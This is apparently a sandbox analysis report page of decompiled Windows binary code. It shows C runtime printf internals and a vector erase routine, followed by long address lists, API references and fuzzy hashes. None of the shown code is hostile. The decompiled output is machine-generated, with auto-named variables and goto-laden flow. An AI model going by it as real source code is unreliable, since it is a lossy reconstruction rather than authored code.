														_push(0x460);
														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
														_push(2);
														_t545 = L0040C820();
														_t703 = _t703 + 0x14;
														if(_t545 == 1) {
															asm("int3");
														}
													}
													L14:
													if( *(_t701 - 0x278) != 0) {
														goto L16;
													} else {
														 *((intOrPtr*)(L00411810(_t618))) = 0x16;
														E0040C660(_t589, _t618, _t699, _t700, L"(\"Incorrect format specifier\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
														 *(_t701 - 0x2f0) = 0xffffffff;
														E00410370(_t701 - 0x40);
														_t518 =  *(_t701 - 0x2f0);
														L229:
														return E00410900(_t518, _t589,  *(_t701 - 0x48) ^ _t701, _t665, _t699, _t700);
													}
												}
											}
											L219:
											__eflags =  *(_t701 - 0x25c);
											if( *(_t701 - 0x25c) == 0) {
												L222:
												 *(_t701 - 0x334) = 1;
												L223:
												_t605 =  *(_t701 - 0x334);
												 *(_t701 - 0x2e0) =  *(_t701 - 0x334);
												__eflags =  *(_t701 - 0x2e0);
												if( *(_t701 - 0x2e0) == 0) {
													_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
													_push(0);
													_push(0x8f5);
													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
													_push(2);
													_t523 = L0040C820();
													_t703 = _t703 + 0x14;
													__eflags = _t523 - 1;
													if(_t523 == 1) {
														asm("int3");
													}
												}
												__eflags =  *(_t701 - 0x2e0);
												if( *(_t701 - 0x2e0) != 0) {
													 *(_t701 - 0x300) =  *(_t701 - 0x24c);
													E00410370(_t701 - 0x40);
													_t518 =  *(_t701 - 0x300);
												} else {
													 *((intOrPtr*)(L00411810(_t605))) = 0x16;
													E0040C660(_t589, _t605, _t699, _t700, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
													 *(_t701 - 0x2fc) = 0xffffffff;
													E00410370(_t701 - 0x40);
													_t518 =  *(_t701 - 0x2fc);
												}
												goto L229;
											}
											L220:
											__eflags =  *(_t701 - 0x25c) - 7;
											if( *(_t701 - 0x25c) == 7) {
												goto L222;
											}
											L221:
											 *(_t701 - 0x334) = 0;
											goto L223;
										}
									}
									L187:
									__eflags =  *(_t701 - 0x24);
									if( *(_t701 - 0x24) == 0) {
										L189:
										 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
										 *((char*)( *((intOrPtr*)(_t701 - 4)))) = 0x30;
										_t639 =  *(_t701 - 0x24) + 1;
										__eflags = _t639;
										 *(_t701 - 0x24) = _t639;
										goto L190;
									}
									L188:
									__eflags =  *((char*)( *((intOrPtr*)(_t701 - 4)))) - 0x30;
									if( *((char*)( *((intOrPtr*)(_t701 - 4)))) == 0x30) {
										goto L190;
									}
									goto L189;
								}
								L183:
								asm("cdq");
								_t658 =  *(_t701 - 0x2c0);
								 *(_t701 - 0x2ac) = E00421720(_t658,  *(_t701 - 0x2bc),  *(_t701 - 8), _t657) + 0x30;
								asm("cdq");
								 *(_t701 - 0x2c0) = E004216B0( *(_t701 - 0x2c0),  *(_t701 - 0x2bc),  *(_t701 - 8), _t658);
								 *(_t701 - 0x2bc) = _t658;
								__eflags =  *(_t701 - 0x2ac) - 0x39;
								if( *(_t701 - 0x2ac) > 0x39) {
									_t662 =  *(_t701 - 0x2ac) +  *((intOrPtr*)(_t701 - 0x260));
									__eflags = _t662;
									 *(_t701 - 0x2ac) = _t662;
								}
								 *((char*)( *((intOrPtr*)(_t701 - 4)))) =  *(_t701 - 0x2ac);
								 *((intOrPtr*)(_t701 - 4)) =  *((intOrPtr*)(_t701 - 4)) - 1;
								L181:
								_t657 =  *(_t701 - 0x30) - 1;
								 *(_t701 - 0x30) =  *(_t701 - 0x30) - 1;
								__eflags =  *(_t701 - 0x30);
								if( *(_t701 - 0x30) > 0) {
									goto L183;
								}
								goto L182;
							}
						}
						L168:
						__eflags =  *(_t701 - 0x2b8);
						if( *(_t701 - 0x2b8) >= 0) {
							goto L170;
						}
						goto L169;
						L170:
						 *(_t701 - 0x2c0) =  *(_t701 - 0x2b8);
						 *(_t701 - 0x2bc) =  *(_t701 - 0x2b4);
						goto L171;
					}
				}
			}

0x0042252c
0x0042252c
0x0042252c
0x0042252c
0x0042253c
0x0042253e
0x00422541
0x00422541
0x00422547
0x00422547
0x0042254a
0x0042254a
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x0042260a
0x0042260f
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225ef
0x004225f4
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c9
0x004225ce
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225ad
0x004225b2
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x00422580
0x00422585
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422558
0x0042255d
0x00422560
0x00422566
0x00422566
0x00422623
0x00422626
0x00000000
0x00000000
0x00422628
0x00422628
0x0042262f
0x00000000
0x00000000
0x00422631
0x00422631
0x0042263c
0x0042264a
0x0042264f
0x00422655
0x00422663
0x00422680
0x00422683
0x00422688
0x0042268d
0x00422693
0x004226a1
0x004226a1
0x004226aa
0x004226aa
0x00422693
0x004226b0
0x004226b4
0x004226c5
0x004226c8
0x004226cf
0x004226d1
0x004226d1
0x004226b6
0x004226b6
0x004226b6
0x004226de
0x004226e4
0x004226e6
0x004226e6
0x004226f0
0x004226f3
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00422703
0x00422709
0x0042270f
0x0042278c
0x00422792
0x0042279b
0x004227a1
0x004227a7
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x004227dc
0x004227df
0x004227e2
0x004227e7
0x004227ec
0x004227fe
0x00422801
0x00422813
0x00422816
0x00422818
0x0042281c
0x0042281c
0x00422803
0x00422803
0x00422807
0x00422807
0x004227ee
0x004227ee
0x004227f2
0x004227f2
0x004227ec
0x0042282c
0x00422835
0x00422838
0x0042284e
0x00422853
0x00422853
0x00422869
0x0042286e
0x00422874
0x00422877
0x0042287c
0x0042287f
0x00422895
0x0042289a
0x0042289a
0x0042287f
0x0042289d
0x004228a1
0x00422975
0x00422988
0x0042298d
0x00000000
0x004228a7
0x004228a7
0x004228a7
0x004228ab
0x00000000
0x00000000
0x004228b1
0x004228b1
0x004228be
0x004228c7
0x004228cd
0x004228cd
0x004228dc
0x004228e2
0x004228e4
0x00000000
0x00000000
0x004228ea
0x004228f3
0x00422912
0x00422917
0x0042291a
0x00422929
0x0042292f
0x00422936
0x00422941
0x00422941
0x00000000
0x00422941
0x00422938
0x00422938
0x0042293f
0x0042294d
0x00422966
0x0042296b
0x00000000
0x0042296b
0x00000000
0x0042293f
0x00422973
0x00422990
0x00422990
0x00422997
0x0042299c
0x0042299f
0x004229b5
0x004229ba
0x004229ba
0x0042299f
0x00422997
0x004229bd
0x004229bd
0x004229c1
0x004229c9
0x004229ce
0x004229d1
0x004229d1
0x004229d8
0x004229d8
0x00421aaf
0x00421ab5
0x00421ac2
0x00421ac7
0x00000000
0x00421ada
0x00421ae4
0x00421b0b
0x00421af2
0x00421b03
0x00421b03
0x00421ae4
0x00421b15
0x00421b1b
0x00421b27
0x00421b2a
0x00421b38
0x00421b3b
0x00421b48
0x00421bed
0x00421bf3
0x00421bf9
0x00421c00
0x00000000
0x00000000
0x00421c06
0x00421c0c
0x00000000
0x00421c13
0x00421c13
0x00421c2b
0x00421c30
0x00421c33
0x00421c35
0x00421cef
0x00421d02
0x00421d07
0x00000000
0x00421c3b
0x00421c4e
0x00421c53
0x00421c59
0x00421c5b
0x00421c64
0x00421c64
0x00421c67
0x00421c73
0x00421c77
0x00421c7d
0x00421c7f
0x00421c84
0x00421c86
0x00421c8b
0x00421c90
0x00421c92
0x00421c97
0x00421c9a
0x00421c9d
0x00421c9f
0x00421c9f
0x00421c9d
0x00421ca0
0x00421ca0
0x00421ca7
0x00000000
0x00421ca9
0x00421cae
0x00421cca
0x00421cd2
0x00421cdf
0x00421ce4
0x00000000
0x00421ce4
0x00421ca7
0x00000000
0x00421d0f
0x00421d0f
0x00421d16
0x00421d19
0x00421d1c
0x00421d1f
0x00421d22
0x00421d25
0x00421d28
0x00421d2f
0x00421d36
0x00000000
0x00000000
0x00421d42
0x00421d42
0x00421d49
0x00421d55
0x00421d58
0x00421d5e
0x00421d65
0x00000000
0x00000000
0x00421d67
0x00421d67
0x00421d6d
0x00421d6d
0x00421d74
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421db7
0x00421db7
0x00421dbe
0x00421dc1
0x00421deb
0x00421dee
0x00421dee
0x00421df1
0x00421df8
0x00421df8
0x00421dfc
0x00421dc3
0x00421dc3
0x00421dcf
0x00421dd2
0x00421dd6
0x00421dd8
0x00421ddb
0x00421ddb
0x00421dde
0x00421de4
0x00421de6
0x00421de6
0x00421de9
0x00000000
0x00000000
0x00421e04
0x00421e04
0x00000000
0x00000000
0x00421e10
0x00421e10
0x00421e17
0x00421e1a
0x00421e3a
0x00421e3d
0x00421e3d
0x00421e47
0x00421e47
0x00421e4b
0x00421e1c
0x00421e1c
0x00421e28
0x00421e2b
0x00421e2f
0x00421e31
0x00421e31
0x00421e38
0x00000000
0x00000000
0x00421e53
0x00421e53
0x00421e5a
0x00421e66
0x00421e69
0x00421e6f
0x00421e76
0x00421f89
0x00000000
0x00421f89
0x00421e7c
0x00421e7c
0x00421e82
0x00421e82
0x00421e89
0x00000000
0x00421ebf
0x00421ebf
0x00421ec2
0x00421ec5
0x00421ec8
0x00421ef0
0x00421ef0
0x00421ef3
0x00421ef6
0x00421ef9
0x00421f1e
0x00421f1e
0x00421f21
0x00421f24
0x00421f27
0x00421f60
0x00421f71
0x00000000
0x00421f71
0x00421f29
0x00421f29
0x00421f2c
0x00421f2f
0x00421f32
0x00000000
0x00000000
0x00421f34
0x00421f34
0x00421f37
0x00421f3a
0x00421f3d
0x00000000
0x00000000
0x00421f3f
0x00421f3f
0x00421f42
0x00421f45
0x00421f48
0x00000000
0x00000000
0x00421f4a
0x00421f4a
0x00421f4d
0x00421f50
0x00421f53
0x00000000
0x00000000
0x00421f55
0x00421f55
0x00421f58
0x00421f5b
0x00421f5e
0x00421f62
0x00000000
0x00421f62
0x00000000
0x00421f5e
0x00421efb
0x00421efb
0x00421efe
0x00421f02
0x00421f05
0x00000000
0x00421f07
0x00421f0a
0x00421f0d
0x00421f10
0x00421f13
0x00421f19
0x00000000
0x00421f19
0x00421f05
0x00421eca
0x00421eca
0x00421ecd
0x00421ed1
0x00421ed4
0x00000000
0x00421ed6
0x00421ed9
0x00421edc
0x00421edf
0x00421ee2
0x00421ee8
0x00000000
0x00421ee8
0x00000000
0x00421f73
0x00421f76
0x00421f79
0x00000000
0x00000000
0x00421e90
0x00421e90
0x00421e93
0x00421e96
0x00421e99
0x00421eb1
0x00421eb4
0x00421eb4
0x00421eb7
0x00421e9b
0x00421e9e
0x00421ea1
0x00421ea7
0x00421eac
0x00421eac
0x00000000
0x00000000
0x00421f7e
0x00421f7e
0x00421f81
0x00421f81
0x00421f86
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00421f8e
0x00421f8e
0x00421f95
0x00421fa1
0x00421fa4
0x00421faa
0x00421fb1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00421fb7
0x00421fbd
0x00421fbd
0x00421fc4
0x00000000
0x0042231e
0x0042231e
0x00422325
0x0042232c
0x0042232c
0x0042232f
0x00000000
0x00000000
0x00421fcb
0x00421fce
0x00421fce
0x00421fd4
0x00421fd6
0x00421fd9
0x00421fd9
0x00421fde
0x00421fde
0x00000000
0x00000000
0x0042210b
0x0042210e
0x0042210e
0x00422113
0x00422115
0x00422118
0x00422118
0x0042211e
0x0042211e
0x00000000
0x00000000
0x004224eb
0x004224eb
0x00000000
0x00000000
0x00422075
0x00422075
0x00422081
0x00422087
0x0042208e
0x0042209c
0x0042209c
0x004220a2
0x004220a5
0x004220b1
0x00422106
0x00000000
0x00422106
0x00422090
0x00422090
0x00422096
0x0042209a
0x004220b6
0x004220b9
0x004220b9
0x004220bf
0x004220e7
0x004220ee
0x004220f4
0x004220f7
0x004220fa
0x00422100
0x00422103
0x004220c1
0x004220c1
0x004220c7
0x004220ca
0x004220cd
0x004220d3
0x004220d6
0x004220d9
0x004220db
0x004220de
0x004220de
0x00000000
0x004220bf
0x00000000
0x00000000
0x00422335
0x00422338
0x0042233b
0x0042233e
0x00422344
0x00422347
0x0042234e
0x00422352
0x0042235d
0x0042235d
0x00422361
0x00422378
0x00422378
0x0042237f
0x00422381
0x00422381
0x00422388
0x00422388
0x0042238f
0x004223a0
0x004223af
0x004223b2
0x004223b6
0x004223cc
0x004223b8
0x004223b8
0x004223bb
0x004223c1
0x004223c7
0x004223c7
0x004223b6
0x004223d6
0x004223d9
0x004223dc
0x004223df
0x004223e2
0x004223e5
0x004223eb
0x004223f1
0x004223f9
0x004223fa
0x004223fd
0x004223fe
0x00422401
0x00422402
0x00422409
0x0042240a
0x0042240d
0x0042240e
0x00422411
0x00422412
0x00422418
0x00422419
0x00422427
0x00422429
0x0042242f
0x0042242f
0x00422435
0x00422437
0x0042243b
0x0042243d
0x00422445
0x00422446
0x00422449
0x0042244a
0x00422458
0x0042245a
0x0042245a
0x0042243b
0x0042245d
0x00422464
0x00422467
0x0042246c
0x0042246c
0x00422472
0x00422474
0x0042247c
0x0042247d
0x00422480
0x00422481
0x00422490
0x00422492
0x00422492
0x00422472
0x00422495
0x00422498
0x0042249b
0x0042249e
0x004224a3
0x004224a9
0x004224ac
0x004224af
0x004224af
0x004224b2
0x004224b2
0x004224b5
0x004224c1
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004227d2
0x00422363
0x00422363
0x0042236a
0x0042236d
0x00000000
0x00000000
0x0042236f
0x0042236f
0x00000000
0x0042236f
0x00422354
0x00422354
0x00000000
0x00000000
0x00421fe1
0x00421fe4
0x00421fe4
0x00421fea
0x00422045
0x0042204d
0x00422054
0x0042205a
0x00422060
0x00421fec
0x00421fec
0x00421ff6
0x00421ffa
0x00422002
0x00422009
0x00422016
0x0042201d
0x00422029
0x0042202f
0x00422036
0x00422038
0x00422038
0x0042203f
0x00422067
0x0042206d
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x004224c9
0x004224cc
0x004224cf
0x004224d2
0x0042254a
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x0042260a
0x0042260f
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225ef
0x004225f4
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c9
0x004225ce
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225ad
0x004225b2
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x00422580
0x00422585
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422558
0x0042255d
0x00422560
0x00422566
0x00422566
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422227
0x00422227
0x00422233
0x00422239
0x0042223e
0x00422240
0x004222ea
0x004222ed
0x004222ed
0x004222f0
0x00422304
0x0042230a
0x00422310
0x004222f2
0x004222f2
0x004222ff
0x004222ff
0x00422312
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00422246
0x00422246
0x00422246
0x00422248
0x00422256
0x0042224a
0x0042224a
0x0042224a
0x00422260
0x00422266
0x0042226c
0x00422273
0x00422275
0x0042227a
0x0042227c
0x00422281
0x00422286
0x00422288
0x0042228d
0x00422290
0x00422293
0x00422295
0x00422295
0x00422293
0x00422296
0x0042229d
0x004222e5
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x0042229f
0x0042229f
0x004222a4
0x004222c0
0x004222c8
0x004222d2
0x004222d5
0x004222da
0x00000000
0x004222da
0x00000000
0x00000000
0x00000000
0x004224e4
0x004224e4
0x00000000
0x00000000
0x00422121
0x00422121
0x00422125
0x00422133
0x00422136
0x00422127
0x00422127
0x00422127
0x0042213c
0x00422142
0x00422148
0x00422154
0x0042215a
0x0042215a
0x00422160
0x004221c7
0x004221c7
0x004221cb
0x004221cd
0x004221d3
0x004221d3
0x004221d6
0x004221d9
0x004221df
0x004221df
0x004221df
0x004221eb
0x004221ee
0x004221f4
0x004221f6
0x00000000
0x00000000
0x004221f8
0x004221f8
0x004221fe
0x00422201
0x00422203
0x00000000
0x00000000
0x00422205
0x0042220b
0x0042220e
0x0042220e
0x00422216
0x00422216
0x0042221c
0x0042221c
0x0042221f
0x00000000
0x00422162
0x00422162
0x00422162
0x00422166
0x00422168
0x0042216d
0x0042216d
0x00422170
0x00422177
0x0042217a
0x00422180
0x00422180
0x00422180
0x0042218c
0x0042218f
0x00422195
0x00422197
0x00000000
0x00000000
0x00422199
0x00422199
0x0042219f
0x004221a2
0x004221a4
0x00000000
0x00000000
0x004221a6
0x004221ac
0x004221af
0x004221af
0x004221b7
0x004221bd
0x004221c0
0x004221c2
0x00422222
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x004227d2
0x00000000
0x004224db
0x004224db
0x0042254a
0x0042254a
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x0042260a
0x0042260f
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225ef
0x004225f4
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c9
0x004225ce
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225ad
0x004225b2
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x00422580
0x00422585
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422558
0x0042255d
0x00422560
0x00422566
0x00422566
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x004224f7
0x004224f7
0x00422501
0x00422501
0x0042250b
0x0042250b
0x00422511
0x00422513
0x0042251d
0x0042251d
0x00422520
0x00422523
0x00422523
0x0042254a
0x0042254a
0x0042254d
0x00422552
0x00422574
0x00422574
0x0042257a
0x0042259c
0x0042259f
0x004225e6
0x004225e6
0x004225e9
0x0042260a
0x0042260f
0x00422612
0x00422614
0x0042261a
0x004225eb
0x004225ef
0x004225f4
0x004225f7
0x004225f8
0x004225fe
0x004225fe
0x004225a1
0x004225a4
0x004225a4
0x004225a7
0x004225c9
0x004225ce
0x004225d4
0x004225d5
0x004225db
0x004225a9
0x004225ad
0x004225b2
0x004225b6
0x004225b7
0x004225bd
0x004225bd
0x004225e1
0x0042257c
0x00422580
0x00422585
0x00422588
0x0042258e
0x0042258e
0x00422554
0x00422558
0x0042255d
0x00422560
0x00422566
0x00422566
0x00422623
0x00422626
0x00000000
0x00000000
0x00000000
0x00422626
0x00000000
0x004227d2
0x004227d2
0x004227d2
0x004227d6
0x00000000
0x00000000
0x00000000
0x004227d6
0x00000000
0x00000000
0x00421d91
0x00421d94
0x00421d97
0x00000000
0x00000000
0x00421d9c
0x00421d9f
0x00421da4
0x00000000
0x00000000
0x00421d86
0x00421d86
0x00421d89
0x00421d8c
0x00000000
0x00000000
0x00421d7b
0x00421d7e
0x00421d81
0x00000000
0x00000000
0x00421da9
0x00421da9
0x00421dac
0x00421dac
0x00421daf
0x00000000
0x00000000
0x00421db2
0x00000000
0x00000000
0x00421b4e
0x00421b50
0x00421b5e
0x00421b52
0x00421b52
0x00421b52
0x00421b68
0x00421b6e
0x00421b7b
0x00421b7d
0x00421b82
0x00421b84
0x00421b89
0x00421b8e
0x00421b90
0x00421b95
0x00421b9b
0x00421b9d
0x00421b9d
0x00421b9b
0x00421b9e
0x00421ba5
0x00000000
0x00421ba7
0x00421bac
0x00421bc8
0x00421bd0
0x00421bdd
0x00421be2
0x00422aa1
0x00422aae
0x00422aae
0x00421ba5
0x00421b48
0x004229dd
0x004229dd
0x004229e4
0x004229fb
0x004229fb
0x00422a05
0x00422a05
0x00422a0b
0x00422a11
0x00422a18
0x00422a1a
0x00422a1f
0x00422a21
0x00422a26
0x00422a2b
0x00422a2d
0x00422a32
0x00422a35
0x00422a38
0x00422a3a
0x00422a3a
0x00422a38
0x00422a3b
0x00422a42
0x00422a8d
0x00422a96
0x00422a9b
0x00422a44
0x00422a49
0x00422a65
0x00422a6d
0x00422a7a
0x00422a7f
0x00422a7f
0x00000000
0x00422a42
0x004229e6
0x004229e6
0x004229ed
0x00000000
0x00000000
0x004229ef
0x004229ef
0x00000000
0x004229ef
0x004227d2
0x004227a9
0x004227a9
0x004227ad
0x004227ba
0x004227c0
0x004227c6
0x004227cc
0x004227cc
0x004227cf
0x00000000
0x004227cf
0x004227af
0x004227b5
0x004227b8
0x00000000
0x00000000
0x00000000
0x004227b8
0x00422711
0x00422714
0x0042271e
0x0042272d
0x00422736
0x0042274c
0x00422752
0x00422758
0x0042275f
0x00422767
0x00422767
0x0042276d
0x0042276d
0x0042277c
0x00422784
0x004226f3
0x004226f9
0x004226fc
0x004226ff
0x00422701
0x00000000
0x00000000
0x00000000
0x00422701
0x004226f3
0x00422633
0x00422633
0x0042263a
0x00000000
0x00000000
0x00000000
0x00422668
0x0042266e
0x0042267a
0x00000000
0x0042267a
0x0042254a

APIs

_get_int64_arg.LIBCMTD ref: 00422558
__aullrem.LIBCMT ref: 00422725
__aulldiv.LIBCMT ref: 00422747

Strings

9, xrefs: 00422758

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: __aulldiv__aullrem_get_int64_arg
String ID: 9
API String ID: 3120068967-2366072709
Opcode ID: 4b53c759fb5598d7223dac6033ad389e7683259cea5d31a5b0edcf01f4a17537
Instruction ID: f28197809f0644f9cc33ed823a86f296d0ce666ce08b3230bca6bbb2a14ba38c
Opcode Fuzzy Hash: 4b53c759fb5598d7223dac6033ad389e7683259cea5d31a5b0edcf01f4a17537
Instruction Fuzzy Hash: E241F472E05229EFEB24CF58DD89BAEB7B5BB84300F50819AE009A7240C7785E85CF44

Uniqueness

Uniqueness Score: -1.00%

Function 0040B66B Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040B66B(void* __ecx, void* __eflags) {
				void* __esi;
				intOrPtr _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				intOrPtr _t94;
				intOrPtr _t95;

				E0040D238(E00425999, _t90);
				 *(_t90 - 0x10) =  *(_t90 - 0x10) & 0x00000000;
				_t88 = __ecx;
				_t94 = _t92 - 0x14;
				 *((intOrPtr*)(_t90 - 0x14)) = _t94;
				 *((intOrPtr*)(_t90 - 4)) = 2;
				E0040B033(_t94, _t90 + 0xc);
				_push(_t90 - 0x20);
				E0040B0C1(__ecx);
				_t95 = _t94 - 0xc;
				 *((intOrPtr*)(_t90 - 0x14)) = _t95;
				 *((char*)(_t90 - 4)) = 3;
				E0040B033(_t95, _t90 + 0x18);
				_push(_t90 - 0x2c);
				E0040B0C1(__ecx);
				 *((char*)(_t90 - 4)) = 4;
				if(E0040AA8F(_t90 - 0x20, _t90 - 0x2c) == 0) {
					_t81 = _t90 - 0x2c;
					if(E0040AA6F(_t90 - 0x2c, _t90 - 0x20) != 0 ||  *((intOrPtr*)(_t90 - 0x20)) != __ecx ||  *((intOrPtr*)(_t90 - 0x18)) <  *((intOrPtr*)(__ecx + 8)) ||  *((intOrPtr*)(__ecx + 0xc)) <  *((intOrPtr*)(_t90 - 0x24))) {
						E0040BB90(L"vector erase iterator outside range", L"C:\\Program Files (x86)\\Microsoft Visual Studio 9.0\\VC\\include\\vector", 0x413);
						_t95 = _t95 + 0xc;
					}
					_t86 = E0040B41E(_t81,  *((intOrPtr*)(_t90 - 0x24)),  *((intOrPtr*)(_t88 + 0xc)),  *((intOrPtr*)(_t90 - 0x18)));
					E0040A71B(_t88, _t88,  *((intOrPtr*)(_t90 - 0x18)),  *((intOrPtr*)(_t88 + 0xc)));
					E0040B446(_t86,  *((intOrPtr*)(_t88 + 0xc)), _t88 + 4);
					 *((intOrPtr*)(_t88 + 0xc)) = _t86;
				}
				E0040AFCF( *((intOrPtr*)(_t90 + 8)),  *((intOrPtr*)(_t90 - 0x18)), _t88);
				 *(_t90 - 0x10) = 1;
				 *((char*)(_t90 - 4)) = 3;
				E0040A9BC(_t90 - 0x2c);
				 *((char*)(_t90 - 4)) = 2;
				E0040A9BC(_t90 - 0x20);
				 *((char*)(_t90 - 4)) = 1;
				E0040A9BC(_t90 + 0xc);
				 *((char*)(_t90 - 4)) = 0;
				E0040A9BC(_t90 + 0x18);
				 *[fs:0x0] =  *((intOrPtr*)(_t90 - 0xc));
				return  *((intOrPtr*)(_t90 + 8));
			}

0x0040b670
0x0040b678
0x0040b67e
0x0040b680
0x0040b688
0x0040b68c
0x0040b693
0x0040b69b
0x0040b69e
0x0040b6a3
0x0040b6ab
0x0040b6af
0x0040b6b3
0x0040b6bb
0x0040b6be
0x0040b6ca
0x0040b6d5
0x0040b6db
0x0040b6e5
0x0040b70b
0x0040b710
0x0040b710
0x0040b72c
0x0040b72e
0x0040b73c
0x0040b741
0x0040b741
0x0040b74b
0x0040b753
0x0040b75a
0x0040b75e
0x0040b766
0x0040b76a
0x0040b772
0x0040b776
0x0040b77e
0x0040b782
0x0040b78e
0x0040b797

APIs

__EH_prolog.LIBCMT ref: 0040B670

Part of subcall function 0040B0C1: __EH_prolog.LIBCMT ref: 0040B0C6

std::_Debug_message.LIBCPMTD ref: 0040B70B

Strings

vector erase iterator outside range, xrefs: 0040B706
C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector, xrefs: 0040B701

Memory Dump Source

Source File: 00000000.00000002.371044521.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.371034338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371262042.000000000042A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371760532.00000000004BB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371769159.00000000004E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.371799237.00000000004E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Q5W0I0pzFI.jbxd

Similarity

API ID: H_prolog$Debug_messagestd::_
String ID: C:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\include\vector$vector erase iterator outside range
API String ID: 3595607964-284143247
Opcode ID: 4074360dbb30038a39c318573cdebddc54579dfa4645dd1844423eb69cd7f6a9
Instruction ID: 83dac62e6db949c961fa816fd95852c7e4a061df308db0775b11623f5e687ed5
Opcode Fuzzy Hash: 4074360dbb30038a39c318573cdebddc54579dfa4645dd1844423eb69cd7f6a9
Instruction Fuzzy Hash: EE313371D002099FCF11EB95C546BEEBBB4EF18314F00846EE815732C2D7799A58CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0042384D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0042384D(signed int __edx) {
				signed int _t483;
				signed int _t502;
				void* _t507;
				signed int _t509;
				void* _t517;
				void* _t535;
				intOrPtr _t539;
				signed int _t556;
				signed short _t557;
				signed int _t560;
				signed int _t563;
				signed int _t564;
				intOrPtr _t565;
				signed int _t619;
				signed int _t621;
				signed int _t623;
				signed int _t630;
				signed int _t642;
				signed int _t669;
				intOrPtr _t670;
				intOrPtr _t671;
				signed int _t672;
				void* _t674;
				void* _t675;
				signed int _t681;

				L0:
				while(1) {
					L0:
					_t619 = __edx;
					 *(_t672 - 8) = 0xa;
					L150:
					while(1) {
						L150:
						while(1) {
							L150:
							while(1) {
								L150:
								if(( *(_t672 - 0x10) & 0x00008000) == 0) {
									_t621 =  *(_t672 - 0x10) & 0x00001000;
									if(_t621 == 0) {
										if(( *(_t672 - 0x10) & 0x00000020) == 0) {
											_t623 =  *(_t672 - 0x10) & 0x00000040;
											if(_t623 == 0) {
